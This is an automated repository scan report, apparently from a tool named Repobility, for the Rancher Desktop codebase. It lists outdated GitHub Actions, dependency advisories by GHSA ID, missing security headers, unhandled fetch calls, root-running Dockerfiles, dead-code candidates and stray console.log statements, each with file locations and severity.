`uses: actions/setup-go@v3` is 3 major version(s) behind the latest published release v6.4.0. Old action majors run on deprecated runner images / Node versions and miss upstream fixes. This is the exact 'outdated GitHub Action' class Dependabot raises — and which Repobility had no coverage for.
src/go/networking/.github/workflows/release.yaml:23
high Security checks software dependencies conf 0.90 GitHub Action `actions/setup-go@v3` is 3 major version(s) behind (latest v6.4.0)
`uses: actions/setup-go@v3` is 3 major version(s) behind the latest published release v6.4.0. Old action majors run on deprecated runner images / Node versions and miss upstream fixes. This is the exact 'outdated GitHub Action' class Dependabot raises — and which Repobility had no coverage for.
src/go/networking/.github/workflows/go.yaml:19
high Security checks software dependencies conf 0.90 GitHub Action `actions/upload-artifact@v3` is 4 major version(s) behind (latest v7.0.1)
`uses: actions/upload-artifact@v3` is 4 major version(s) behind the latest published release v7.0.1. Old action majors run on deprecated runner images / Node versions and miss upstream fixes. This is the exact 'outdated GitHub Action' class Dependabot raises — and which Repobility had no coverage f…
src/go/networking/.github/workflows/release.yaml:34
high Security checks software dependencies conf 0.90 GitHub Action `golangci/[email protected]` is 6 major version(s) behind (latest v9.2.1)
`uses: golangci/[email protected]` is 6 major version(s) behind the latest published release v9.2.1. Old action majors run on deprecated runner images / Node versions and miss upstream fixes. This is the exact 'outdated GitHub Action' class Dependabot raises — and which Repobility had no …
src/go/networking/.github/workflows/go.yaml:28
medium Security checks software dependencies conf 0.88 github.com/docker/docker: GHSA-vp62-88p7-qqf5
Docker: Race condition in docker cp allows creation of arbitrary empty files on the host via symlink swap
src/go/guestagent/go.mod
medium Security checks software dependencies conf 0.88 ip-address: GHSA-v2v4-37r5-5v8g
ip-address has XSS in Address6 HTML-emitting methods
yarn.lock
medium Security checks software dependencies conf 0.88 js-yaml: GHSA-mh29-5h37-fv8m
js-yaml has prototype pollution in merge (<<)
yarn.lock
medium Security checks software dependencies conf 0.88 path-to-regexp: GHSA-27v5-c462-wpq7
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple wildcards
yarn.lock
medium Security checks software dependencies conf 0.88 picomatch: GHSA-3v7f-55p6-f55p
Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching
yarn.lock
medium Security checks software dependencies conf 0.88 postcss: GHSA-7fh5-64p2-3v2j
PostCSS line return parsing error
yarn.lock
medium Security checks software dependencies conf 0.88 postcss: GHSA-qx2v-qp2m-jg93
PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
yarn.lock
medium Security checks quality Quality conf 0.70 Public web app has no Content Security Policy
A Content Security Policy reduces the blast radius of injected scripts if the app is ever served through preview, static hosting, or a web container outside its normal sandbox.
index.html
medium Security checks quality Quality conf 0.78 Public web service has no security.txt
security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt.
.well-known/security.txt
medium Security checks software dependencies conf 0.88 qs: GHSA-6rw7-vpxm-498p
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
yarn.lock
medium Security checks software dependencies conf 0.88 qs: GHSA-q8mj-m7cp-5q26
qs has a remotely triggerable DoS: qs.stringify crashes with TypeError on null/undefined entries in comma-format arrays when encodeValuesOnly is set
yarn.lock
medium Security checks software dependencies conf 0.88 serialize-javascript: GHSA-qj8w-gfj5-8c6v
Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects
yarn.lock
medium Security checks software dependencies conf 0.88 uuid: GHSA-w5hq-g745-h8pq
uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided
yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-4v9v-hfq4-rm2v
webpack-dev-server users' source code may be stolen when they access a malicious web site
yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-79cf-xcqc-c78w
webpack-dev-server vulnerable to cross-origin source code exposure on non-HTTPS origins
yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-9jgg-88mc-972h
webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser
yarn.lock
medium Security checks software dependencies conf 0.88 ws: GHSA-58qx-3vcg-4xpx
ws: Uninitialized memory disclosure
yarn.lock
medium Security checks software dependencies conf 0.88 yaml: GHSA-48c2-rrv3-qjmp
yaml is vulnerable to Stack Overflow via deeply nested YAML collections
yarn.lock
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — e2e/backend.e2e.spec.ts:71
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — e2e/credentials-server.e2e.spec.ts:281
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — e2e/extensions.e2e.spec.ts:139
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — e2e/rdctl.e2e.spec.ts:146
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/backend/containerClient/registry.ts:17
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/backend/k3sHelper.ts:446
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/main/extensions/manager.ts:258
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/main/update/LonghornProvider.ts:293
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/store/credentials.ts:33
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/store/diagnostics.ts:118
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/store/extensions.ts:61
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/store/preferences.ts:138
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/store/snapshots.ts:21
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/store/transientSettings.ts:54
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — pkg/rancher-desktop/utils/protocols.ts:52
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph hardware Security conf 1.00 Dockerfile runs as root: bats/tests/compose/testdata/app/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: bats/tests/extensions/testdata/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph cicd CI/CD security conf 1.00 9 occurrences GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Prefer job-level least-privilege permissions.
9 files, 9 locations
.github/workflows/k3s-versions.yaml
.github/workflows/rddepman.yaml
.github/workflows/rdx-host-api-tests.yaml
.github/workflows/release-merge-to-main.yaml
.github/workflows/scorecard.yml
.github/workflows/smoke-test.yaml
.github/workflows/upgrade-generate.yaml
.github/workflows/yarn-dedupe.yaml
CI/CD securitySupply chainGithub actions
medium System graph security security conf 1.00 Insecure pattern 'weak_hash' in src/go/networking/.github/workflows/release.yaml:54
Found a known-risky pattern (weak_hash). Review and replace if possible.
src/go/networking/.github/workflows/release.yaml:54 Weak hash
low Security checks quality Error handling conf 1.00 3 occurrences [ERR003] Ignored Error (Go): Ignoring error return values.
Handle the error or use errcheck linter.
3 files, 3 locations
src/go/guestagent/pkg/kube/servicewatcher_linux.go:51
src/go/guestagent/pkg/procnet/loopback_forwarder_linux.go:117
src/go/networking/cmd/host/switch_windows.go:162
low Security checks software dependencies conf 0.88 brace-expansion: GHSA-v6h2-p8h4-qcjw
brace-expansion Regular Expression Denial of Service vulnerability
yarn.lock
low Security checks software dependencies conf 0.88 cookie: GHSA-pxg6-pf52-xh8x
cookie accepts cookie name, path, and domain with out of bounds characters
yarn.lock
low Security checks software dependencies conf 0.88 diff: GHSA-73rr-hh4g-fpgx
jsdiff has a Denial of Service vulnerability in parsePatch and applyPatch
yarn.lock
low Security checks quality Quality conf 0.60 30 occurrences Duplicated implementation block across source files
Duplicate implementation blocks are maintenance debt. Keep them visible, but they are not a high-severity defect unless the duplicated logic is security-sensitive or drifting.
12 files, 14 locations
pkg/rancher-desktop/components/Preferences/BodyWsl.vue:29, 30 (2 hits)
src/go/networking/cmd/host/switch_windows.go:1, 2 (2 hits)
pkg/rancher-desktop/backend/containerClient/nerdctlClient.ts:152
pkg/rancher-desktop/backend/images/nerdctlImageProcessor.ts:38
pkg/rancher-desktop/backend/kube/wsl.ts:57
pkg/rancher-desktop/components/ContainerShell.vue:71
pkg/rancher-desktop/components/Preferences/BodyContainerEngine.vue:33
pkg/rancher-desktop/components/Preferences/BodyVirtualMachine.vue:21
duplicationquality
low Security checks quality Quality conf 0.70 Generated build artifact directory is present at repository root
Committed build outputs and caches make scans slower, confuse duplicate-code checks, and give AI agents stale generated code to imitate.
build:1
low Security checks software dependencies conf 0.90 npm package `@vue/eslint-config-typescript` is minor version(s) behind (14.7.0 -> 14.8.0)
`@vue/eslint-config-typescript` is pinned/resolved at 14.7.0 but the latest stable release on the npm registry is 14.8.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update…
package.json
low Security checks software dependencies conf 0.90 npm package `@yarnpkg/cli` is minor version(s) behind (4.15.0 -> 4.16.0)
`@yarnpkg/cli` is pinned/resolved at 4.15.0 but the latest stable release on the npm registry is 4.16.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.90 npm package `node-addon-api` is minor version(s) behind (8 -> 8.8.0)
`node-addon-api` is pinned/resolved at 8 but the latest stable release on the npm registry is 8.8.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.90 npm package `node-gyp` is minor version(s) behind (12.3.0 -> 12.4.0)
`node-gyp` is pinned/resolved at 12.3.0 but the latest stable release on the npm registry is 12.4.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.90 npm package `ts-loader` is minor version(s) behind (^9.5.7 -> 9.6.0)
`ts-loader` is pinned/resolved at ^9.5.7 but the latest stable release on the npm registry is 9.6.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.88 on-headers: GHSA-76c9-3jph-rj3q
on-headers is vulnerable to http response header manipulation
yarn.lock
low Security checks quality Quality conf 0.64 Public docs site has no llms.txt
AI coding agents increasingly read llms.txt to find canonical docs and API workflows. Without it, agents are more likely to browse pages repeatedly or use stale instructions.
llms.txt
low Security checks quality Quality conf 0.50 Public web app has no humans.txt
humans.txt is optional, but it gives operators and reviewers a simple place to find ownership, contact, and important public documentation links.
humans.txt
low Security checks quality Quality conf 0.74 Public web app has no robots.txt
Public websites should publish a robots.txt file so crawlers and AI agents can discover crawl rules and sitemap locations without guessing.
robots.txt
low Security checks quality Quality conf 0.72 Public web app has no sitemap
A sitemap gives search engines, docs crawlers, and AI agents a structured list of public pages. Without one, important docs and product pages are easy to miss.
sitemap.xml
low Security checks software dependencies conf 0.88 qs: GHSA-w7fw-mjwx-w883
qs's arrayLimit bypass in comma parsing allows denial of service
yarn.lock
low Security checks software dependencies conf 0.88 tmp: GHSA-52f5-9888-hmc6
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
yarn.lock
low Security checks software dependencies conf 0.88 webpack: GHSA-38r7-794h-5758
webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence
yarn.lock
low Security checks software dependencies conf 0.88 webpack: GHSA-8fgc-7cc6-rx7x
webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior
yarn.lock
low System graph quality Maintenance conf 1.00 48 TODO/FIXME markers
High count of TODO/FIXME/HACK markers — track them as issues so they're not forgotten.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: jest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/__tests__/PreferencesButton.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/__tests__/StatusBar.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/form/labeled-select-utils/labeled-select-pagination.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/actions.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/advanced-filtering.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/debug.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/grouping.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/paging.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/sortable-config.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/__tests__/commandLineOptions.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/__tests__/settingsMigrations.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/cookies.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/emptyStubForJSLinter.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/query-params.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/types.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/entry/router.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/integrations/__tests__/manageLinesInFile.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/integrations/__tests__/windowsIntegrationManager.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/middleware/i18n.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/middleware/indexRedirect.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/mixins/compact-input.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/mixins/vue-select-overrides.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/applicationSettings.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/page.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/snapshots.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/steve.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/types/components/labeledSelect.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/dockerUtils.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/iterator.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/kubeVersions.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/networks.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/environment.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/ipcRenderer.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/processOutputInterpreters/__tests__/image-build-output.spec.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/processOutputInterpreters/__tests__/image-non-build-output.spec.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/processOutputInterpreters/__tests__/trivy-image-output.spec.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/testUtils/setupVue.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/type-helpers.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/playwright-config.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/screenshots.e2e.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/container-inspect.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/containers.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/images.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/preferences.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/snapshots.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/volumes.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: scripts/dependencies/global.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: scripts/extension-data.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: scripts/lint-typescript.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph quality Tests conf 1.00 Low test-to-source ratio
103 tests / 487 src (ratio 0.21).
low System graph quality Integrity conf 1.00 Old/deprecated-named symbol `convertToRegistryLegacy` in e2e/utils/TestUtils.ts:59
Names with suffixes like `_old`, `_v1`, `_deprecated` usually indicate replaced-but-not-removed code (typical AI-coder leftover). Confirm and delete, or rename if it's the active version.
old markerDead code
low System graph cicd CI/CD security conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts execute during dependency installation. Review them carefully for network calls, obfuscation, shell execution, or credential access.
package.json CI/CD securitySupply chainNpm
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — background.ts:154
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — e2e/credentials-server.e2e.spec.ts:92
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — e2e/extensions.e2e.spec.ts:187
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — e2e/pages/nav-page.ts:67
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — e2e/startup-profiles.e2e.spec.ts:111
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — e2e/utils/ProfileUtils.ts:221
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — e2e/utils/TestUtils.ts:139
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/backendHelper.ts:201
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/containerClient/nerdctlClient.ts:458
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/images/imageProcessor.ts:136
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/images/mobyImageProcessor.ts:104
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/images/nerdctlImageProcessor.ts:91
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/k3sHelper.ts:284
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/kube/client.ts:237
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/kube/lima.ts:43
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/kube/wsl.ts:35
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/kubeconfig.ts:155
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/lima.ts:407
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/mock.ts:65
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/steve.ts:142
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/backend/wsl.ts:306
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/components/ContainerShell.vue:188
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/components/Images.vue:306
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/components/Preferences/ModalBody.vue:50
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/components/SortableTable/debug.js:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
